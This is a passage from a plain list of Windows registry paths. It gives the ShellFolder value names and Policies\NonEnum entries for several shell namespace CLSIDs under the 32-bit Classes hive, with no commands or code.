HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{4336A54D-038B-4685-AB02-99BB52D3FB8B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{89D83576-6BD1-4C86-9454-BEB04E94C819}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{89D83576-6BD1-4C86-9454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9343812E-1C37-4A49-A12E-4B2D810D956B}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{9343812E-1C37-4A49-A12E-4B2D810D956B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideFolderVerbs
